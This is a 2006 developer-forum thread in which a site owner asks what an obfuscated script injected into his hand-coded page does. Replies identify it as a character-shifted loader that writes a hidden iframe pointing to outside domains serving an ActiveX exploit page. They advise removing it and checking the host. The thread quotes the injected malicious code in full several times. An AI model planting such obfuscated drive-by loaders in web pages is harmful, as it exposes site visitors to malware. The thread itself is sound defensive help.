469,575 Members | 1,253 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 469,575 developers. It's quick & easy.

Strange appearing javascript - hacked

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);
Thanks!

Oct 23 '06 #1
4 1460
Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.
Wong Yung wrote:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!
Oct 23 '06 #2
Wong Yung said the following on 10/22/2006 11:04 PM:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!
It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Oct 23 '06 #3
Wong Yung said the following on 10/23/2006 12:55 AM:
Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.
And then it does more, see my other post.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Oct 23 '06 #4

Randy Webb wrote:
Wong Yung said the following on 10/22/2006 11:04 PM:
Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&
${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>
rsri&B';o='';for(i=0;i<92;i++){o+=String.from
CharCode(s.charCodeAt(i)-4);}document.write(o);
Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/
Thanks for the info!

Oct 23 '06 #5

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

reply views Thread by Gowhera Hussain | last post: by
2 posts views Thread by Joshua S. Gabrielson | last post: by
8 posts views Thread by John Haycock | last post: by
8 posts views Thread by anndr0id | last post: by
84 posts views Thread by Patient Guy | last post: by
reply views Thread by suresh191 | last post: by
4 posts views Thread by guiromero | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.